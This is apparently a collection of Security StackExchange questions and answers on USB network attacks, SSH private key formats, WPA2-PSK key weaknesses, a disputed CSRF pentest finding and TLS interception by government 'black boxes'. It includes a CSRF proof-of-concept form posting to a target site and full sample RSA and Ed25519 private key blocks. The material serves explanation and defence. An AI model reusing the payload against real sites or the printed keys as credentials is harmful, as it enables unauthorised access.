Sniffing and modification of unencrypted connections. Gmail usually is encrypted and thus not affected.

> Is it something that most people can pull off, or does it depend on specific hardware and a high level of skill?

It needs special hardware and software, but the hardware is cheap and the software has been released. It needs about the same level of experience as attacks like ARP or DHCP spoofing, i.e. script kiddies could do it.

> Is there something that one can do easily, without closing all browsers or turning off the PC each time you walk to a different room to ask a short question? (Is locking it sufficient?)

The usual protections against other USB-based attacks still work, i.e. disable USB or restrict the kinds of devices allowed. But note that if the device has an Ethernet port you could mount a similar attack through that, since any kind of wired connection is preferred to wireless by most systems.
{ "source": [ "https://security.stackexchange.com/questions/142879", "https://security.stackexchange.com", "https://security.stackexchange.com/users/15756/" ] }
143,114
When one creates an ECC SSH key, for example, this command can be used:

    ssh-keygen -o -a 100 -t ed25519

As I understand, the -o argument is used to generate:

> The private keys using a newer format opposed to the more commonly accepted PEM

Are these "newer formats" DSA/RSA/ECC, or might it be PPK vs PEM? Sorry if I confuse SSH key formats with private SSH keys' file extensions; I wish to ask about the main difference between PEM and the "newer formats" mentioned in the quote.
First off, here's the full man page entry for ssh-keygen -o from my machine (ssh-keygen doesn't seem to have a version flag, but the man page is from February 17, 2016):

> -o Causes ssh-keygen to save private keys using the new OpenSSH format rather than the more compatible PEM format. The new format has increased resistance to brute-force password cracking but is not supported by versions of OpenSSH prior to 6.5. Ed25519 keys always use the new private key format.

Seems pretty clear that this is just about the format of the file that's being produced. Also note that ssh-keygen will only store Ed25519 keys in the new format, regardless of what flags you pass in. Since both of your questions today have had the same underlying question, let's deal with it.

> ... these "newer formats" DSA/RSA/ECC ...

Ok, so DSA, RSA, and ECC are not different formats; they are completely different algorithms and are completely unrelated to each other. I wish I could find a better way of explaining this, but I'm not sure I can without getting too technical. Let's try this: it's a bit like saying that HTTP and FTP are just different formats for transferring files, or that .docx and .pptx are different formats of Office documents. Calling these "just format differences" is fundamentally wrong; the software is doing a very different thing in the two cases (albeit to produce the same end result: transferring a file, or making a pretty document).

Now let's talk about formats. So you want to save a private key in a file? PEM is a file format for storing general cryptographic information, but other file formats exist. PEM can be used for many things: private keys, or certificates, or the text of an email that you want to encrypt or sign. It's just a container for "cryptographic stuff".

Analogy time: saving a Word document. You could save it in the old .doc format which is universally accepted by all versions of Office and also open source programs (PEM is also older and universally accepted), or you could use the newer .docx format (the -o OpenSSH format). Sometimes new features are not backwards compatible and can only be saved in the new format (like Ed25519). (Many thanks to @GordonDavisson for this analogy)

# Examples

## PEM format with an RSA key
Note that the message starts with -----BEGIN RSA PRIVATE KEY-----; this is the standard industry-wide PEM format - any software that can read PEM will be able to read this:

    $ ssh-keygen -a 100 -t rsa
    $ cat .ssh/id_rsa
    -----BEGIN RSA PRIVATE KEY-----
    MIIEowIBAAKCAQEAwTLkTDZUisg0M/3BDBOjrmBvJXb8cdfveGG1KQhAhFDLMp5w
    XKgGFMy339m3TGB1+ekKoXnX3dcRQtpQbuFeDB59cmKpDGZz7BzfetpjeIOGCzG+
    Vt2BnDf2OlKb6EE7tC3PSmFgL0nQPSyz8x7rE7CMOQEnz1tKkK9Gpttcku8ifwmd
    LAHlVaTV3BIiFJN23fwe7l0czFaV98iy8YRgk/Av3gRlsBABGT5qD8wPiI4Ygpxv
    UuT2kq53lhBTWO9hIth5tUU0N7x7QN6/rRSi2uHcmJYXFkpsLie697G17TN5ln3E
    X5frsrjVyu0JhjvC5mlRBudSJWcWm/KrcTQxdQIDAQABAoIBAFR6nWtZ4nPhATqu
    veg6+jq4vkEim1ZodrUr/FxZ2GRDM+cJctaBPk+ACPMgL099ankB1v0u2x6M+WZD
    MiKZ91bTSkVnMMZUUmIvaeU9c3tx/34LnVA8gX0+1zM/hh7zz1iFI3xBwh5LZ3wo
    fPNVVLOCYn5WrAK2x48mpX02tG8m0OY5kdCdFW1f6UbCGk3K9ov82yQ+JbjWydOS
    ZaS7bnJCRsjDhPm/Ooe2DZ8CKHRO3DOiZAAFYqsosxM2C12+alC+hdKHoJ0pWZWe
    eckZiALTENi+PzgSq4ykdBaoreeI84lpIzYQO06rrjM2/fw1x/SQsDYhCsQnNRib
    sipl2mECgYEA74rBQDIEWaIVVZ72foeZYOMmAUKCLQtNxVuGl/XoMZO3evN2vbOv
    Nw/nn5lVt6PRykVUUl6yb5gHvRSGtGJSB1q6pBVN1EF2sfvUep6mmpEwbSbENiAX
    IftE0ap7PKT1aLKbLllwdsJlLCRMJIk07AvsulbkhSC+UmJVkfjblgkCgYEAznkE
    fzmWS358MLxb0JM+4v1DO/1ne8z29ddHNppxSNj2Xjf+MMvOY4KaRQa8dMwc3Eqa
    1EvPqnK6ila4L08Ai4CyWoGkkkIQBO9jO3mLp24xk6TRo002DbfJRnu4qW4zeryp
    gYeFfBzwhc/IQKjXhv8AAfEUFCSYiFaWBsENuw0CgYEAwmyDyCAQqdPFrzYT6cUT
    t7EGYtVhpT/cgshz6Rk9uiekL9Y2VWjnWTC+liq1iRUdLSiydRzJhYwHE+/6GaUH
    4VJB1PY5soLj3TiCUHg+z4vym1VwwmGvhPRV+jt+RU26ppz5GVic0LeduINJjgoT
    e1d+cAwg9PELqQCJZa5wREkCgYBPEuPZAaoAsalIVOro32uHLS1xrSPTsvSlxFO+
    orleB9Ga1eDguT0KuTrx0pmcNYucBmpzgbE/ev7b+khBvgTcaGZl6R6o8OoHqdKc
    NXl5nucXv1iWLPzVlhxchQd8w/qtN9HHDKrflIm9BY2Qzdj1F3XeSIDDEhzkohyE
    66yhhQKBgGh9knh8SxnVxaPk0Rk/bQope9AwIDuIpfsf4KC/EPSZmMNHP8xBh8al
    eymUot7Pj6dck31V4C3q74NKobY3p6fZ5t7tP9K6Br+J/FQFhvAdFAwpTD2Bks5H
    fhZO5cniPpydb0YvOnoaVnb0nzXVsf1jIgPKfsCsZxoyE0jLb9oV
    -----END RSA PRIVATE KEY-----

## OpenSSH format with an ed25519 key

In addition to it being shorter (because ECC keys just are that much shorter), notice that the message starts with -----BEGIN OPENSSH PRIVATE KEY-----; this is an OpenSSH-specific format that other software may or may not be able to read:

    $ ssh-keygen -o -a 100 -t ed25519
    $ cat .ssh/id_ed25519.o
    -----BEGIN OPENSSH PRIVATE KEY-----
    b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
    QyNTUxOQAAACC7gIlwBMp+H6VVNZSHI0in2iCU/yi67WfeFPfuyAdkBAAAAJh7nk7je55O
    4wAAAAtzc2gtZWQyNTUxOQAAACC7gIlwBMp+H6VVNZSHI0in2iCU/yi67WfeFPfuyAdkBA
    AAAEBHl+qBAosBAUIGuvdDR8gJN/PEhempLe4NtyKiO7hCPLuAiXAEyn4fpVU1lIcjSKfa
    IJT/KLrtZ94U9+7IB2QEAAAAEm1pa2VATWlrZS1zYW1zdW5nMQECAw==
    -----END OPENSSH PRIVATE KEY-----
{ "source": [ "https://security.stackexchange.com/questions/143114", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
143,268
WPA2 can be cracked using Aircrack-ng in Kali Linux. Is there any other security protocol for Wi-Fi which is not compromised?
EDIT/UPDATE 2017-10-17: This answer does not account for KRACK. That's an attack on both WPA2-PSK and WPA2-Enterprise. There are ways to detect and mitigate it, but they're not covered here.

You need to make a distinction here. There are multiple things to consider. Also, "WPA2" isn't precise enough – there's WPA2-PSK (pre-shared key), and WPA2-Enterprise (which relies on an external auth server).

## 1. The attacker wants to gain access to traffic or the network, but is not in possession of the credentials to enter

Well, bad luck. WPA2, both PSK and Enterprise, protect well against that, unless the credentials are easy to guess. And that's not a "brokenness" on the part of the system – if you used your user name as login to a website, you really can't blame the website for being "easy to crack". So, in this respect, WPA2 is utterly secure (as long as you don't use WPS, but your question is about hotspots, so that's pretty surely not the case).

## 2. The attacker is already part of the network and now wants to read other users' traffic

That's an especially relevant attack scenario for hotspots – getting access to the network might be as simple as buying a cup of coffee in cash. So. Let's make a distinction here:

### 2.1. Hotspot uses WPA2-Enterprise

You log on to the hotspot, proving (securely) that you know the credentials. The access point checks that in cooperation with an authentication server (802.1x). The authentication server generates a secret that is cryptographically secure enough to base your communication with the Access Point on. Every user gets a different key for encrypting their traffic. No user can spy on other users. WPA2-Enterprise is not "broken" in any sense of the word.

### 2.2. Hotspot uses WPA2-PSK

You log onto the access point, proving that you know the PSK. The access point generates, in cooperation with you, a secret key with which you encrypt and decrypt traffic between you and the hotspot. Other users do the same: prove that they know (the same) PSK, then generate a secret for their traffic crypto. So, at first look, this is just as secure as WPA2-Enterprise.

HOWEVER: Due to weaknesses in the way the user-AP secret keys are generated, it's very easy for someone who already has one of these keys (which being logged on to the cafe's AP guarantees) and knows the PSK (which every user of your favourite coffee shop does) to recover the secret user-AP key of someone else by observing but a couple of packets, totally passively. That is a serious design flaw.

Hence, WPA2-PSK is "broken" in the sense that it doesn't protect users of a WiFi network against spying by other legitimate users of the same network. @Josef and I aren't in full agreement whether that is "by design" or really "brokenness". In any case, what you should take away from this is: whenever you're on a WiFi that uses the same key for everyone, your traffic can be read by everyone else on the network.

> Is there any other security protocol for Wi-Fi which is not compromised?

Use WPA2-Enterprise. You will need to set up an 802.1x server (typically RADIUS or something equivalent), and that can be a hassle, but if you own an Access Point and want to provide secure access to everyone, that's your only choice. And it's not that complicated, at all.

If you're just a user of a WiFi, an old saying applies: Trust no-one else's infrastructure. Use encryption. In other words, if you're on a network where you can't trust other users, you might as well not trust the Access Point, which has the job of deciphering your WiFi traffic...
Use a VPN whenever you're on someone else's network. That's standard etiquette.
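To make the WPA2-PSK weakness concrete: the pairwise master key (PMK) is derived only from the passphrase and the SSID, so every legitimate user of the hotspot computes the same PMK, and anyone who also captures another client's 4-way handshake nonces can derive that client's session keys. A rough sketch of the PMK step (standard PBKDF2-HMAC-SHA1, 4096 iterations, 32-byte output); the SSID and passphrase are made up:

```python
# WPA2-PSK: the pairwise master key (PMK) depends only on passphrase + SSID,
# so everyone who knows the coffee-shop password derives the identical PMK.
import hashlib

ssid = "CafeHotspot"            # made-up network name
passphrase = "latte4every1"     # made-up pre-shared key printed on the menu

pmk = hashlib.pbkdf2_hmac("sha1",
                          passphrase.encode("utf-8"),
                          ssid.encode("utf-8"),
                          4096,       # iteration count fixed by the standard
                          dklen=32)   # 256-bit PMK

print(pmk.hex())
# The per-client transient keys are then derived from this shared PMK plus
# nonces and MAC addresses exchanged in the clear during the 4-way handshake.
```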
{ "source": [ "https://security.stackexchange.com/questions/143268", "https://security.stackexchange.com", "https://security.stackexchange.com/users/94443/" ] }
143,351
We've recently had one of our webapps pentested. All went well, except for a CSRF vulnerability, and it is this finding I have a bone to pick with.

Some background: we're using ASP.NET MVC and, among other things, we do use the CSRF protection functionality built into it. The way it works is strictly in accordance with what OWASP recommends: by including so-called "synchronizer tokens", one in an HTTP cookie, and another in a hidden input named __RequestVerificationToken:

    <form action="/Home/Test" method="post">
        <input name="__RequestVerificationToken" type="hidden" value="6fGBtLZmVBZ59oUad1Fr33BuPxANKY9q3Srr5y[...]" />
        <input type="submit" value="Submit" />
    </form>

We also do regular Acunetix scans, and said scans never found any CSRF-unprotected forms. Now, what the pentesters claim is that they were able to "breach" our CSRF protection with the following code:

    <html>
      <body>
        <form action="https://our.site/support/discussions/new" method="POST">
          <input type="hidden" name="subject" value="Subject" />
          <input type="hidden" name="content" value="Content" />
          <input type="hidden" name="__RequestVerificationToken" value="_e-upIZFx7i0YyzrVd[...]" />
          <input type="submit" value="Submit Request" />
        </form>
      </body>
    </html>

The inclusion of the __RequestVerificationToken field is what bothers me the most: to me, it is akin to claiming that an attacker has transferred a gazillion dollars from my bank account because I voluntarily gave him my iPhone to fiddle with, and he saw the one-time password that my bank sent in an SMS.

I imagine that the only way this attack could potentially work is if we were not using HTTPS, were vulnerable to XSS, were using non-HTTP-only cookies and were negligent with the Same Origin Policy. None of which is true, since none of these vulnerabilities were reported by either the pentesters or Acunetix.

So the question is: am I wrong and this is a legit CSRF vulnerability, or is it not?
This does not seem to be a CSRF vulnerability. If an attacker needs to know the CSRF token, then it's not an attack. And your approach to CSRF does seem to be correct. Issues which leak the CSRF token can indeed result in a CSRF attack, but then the problem isn't incorrect CSRF protection, but those issues (XSS, encryption, CSRF token in URL, and so on). Still, I would ask the tester for clarification. Who knows, maybe the attack always works with that specific token, because it is hardcoded somewhere, or because the special characters are causing some sort of problem for your application. Or maybe it is possible to use a token from a different user, or maybe the token check just doesn't work at all and accepts arbitrary tokens. The report should have contained more details, so I would check back with the tester about this.
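For completeness, the server-side check that makes the reported "attack" a non-issue is essentially a constant-time comparison between the token bound to the user's session and the token posted back in the form. Below is a framework-agnostic sketch of that idea; ASP.NET MVC's built-in ValidateAntiForgeryToken performs the equivalent check for you, and the function names here are illustrative:

```python
# Framework-agnostic sketch of the synchronizer-token check; ASP.NET MVC's
# [ValidateAntiForgeryToken] performs the equivalent comparison internally.
import hmac
import secrets

def issue_csrf_token(session: dict) -> str:
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token           # bound to the authenticated session
    return token                            # embedded as the hidden form field

def verify_csrf_token(session: dict, submitted_token: str) -> bool:
    expected = session.get("csrf_token", "")
    # compare_digest avoids timing side channels; an attacker who cannot read
    # the victim's own token has no way to make this check pass.
    return bool(expected) and hmac.compare_digest(expected, submitted_token)
```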
{ "source": [ "https://security.stackexchange.com/questions/143351", "https://security.stackexchange.com", "https://security.stackexchange.com/users/30103/" ] }
143,387
I have been reading about the Snoopers' Charter bill that was passed in the UK this week. It mentions a "Black Box", which is described here: ‘Black boxes’ to monitor all internet and phone data. It states it works like so:

> When an individual uses a webmail service such as Gmail, for example, the entire webpage is encrypted before it is sent. This makes it impossible for ISPs to distinguish the content of the message. Under the Home Office proposals, once the Gmail is sent, the ISPs would have to route the data via a government-approved "black box" which will decrypt the message, separate the content from the "header data", and pass the latter back to the ISP for storage.

It is very vague about how this "decryption" of the data would actually work. Is there such a thing as a "Black Box", and should I be concerned?
Yes. It's called a Man-in-the-Middle attack. You terminate the SSL session at a mid-point, thereby having the encryption key, then create a new session to the target server, so you have that encryption key too. The data path now goes User -> MitM -> Server, where each of the arrows is an encrypted connection; data returned from the server goes Server -> MitM -> User in the same way. Each arrow is encrypted, but at the MitM point itself the data is available in the clear.

There are ways to prevent this from working, but in the case of a government-mandated system, it seems likely that these will be specifically avoided - there may be regulations for companies to provide valid certificates for the "black boxes", so that HPKP keeps working, for example. It is unclear whether such rules would apply to companies which don't operate directly in the UK, or whether there would be penalties for attempting to bypass these rules (for example, by the use of VPNs based in other countries).

Edit based on comments: Note that it is technically possible to create such a device, but the problems mostly come from requiring cooperation from a large number of parties. As a government, there are options available which aren't possible for smaller actors. For example, it would be possible (if unlikely) to require that all internet-connected devices sold in the UK come pre-configured with a government-issued root CA certificate, and to prosecute anyone using a device which does not have this installed. This would be terrible for internet security, but so is the overall concept, so it depends on security experts convincing the government just how bad this idea is.
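One way an end user (or an automated canary) can notice this kind of interception is to compare the certificate actually presented by a server against a fingerprint obtained out of band: an intercepting box has to substitute its own certificate, which changes the fingerprint. A rough sketch with Python's standard library; the host name and the pinned fingerprint below are placeholders:

```python
# Rough MITM canary: fetch the certificate a host presents and compare its
# SHA-256 fingerprint with a value pinned out of band (placeholder below).
import hashlib
import ssl

HOST = "example.com"                    # placeholder host
PINNED_SHA256 = "replace-with-fingerprint-recorded-over-a-trusted-path"

pem_cert = ssl.get_server_certificate((HOST, 443))
der_cert = ssl.PEM_cert_to_DER_cert(pem_cert)
fingerprint = hashlib.sha256(der_cert).hexdigest()

print("presented:", fingerprint)
if fingerprint != PINNED_SHA256:
    print("certificate differs from the pinned value - possible interception")
```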
{ "source": [ "https://security.stackexchange.com/questions/143387", "https://security.stackexchange.com", "https://security.stackexchange.com/users/87457/" ] }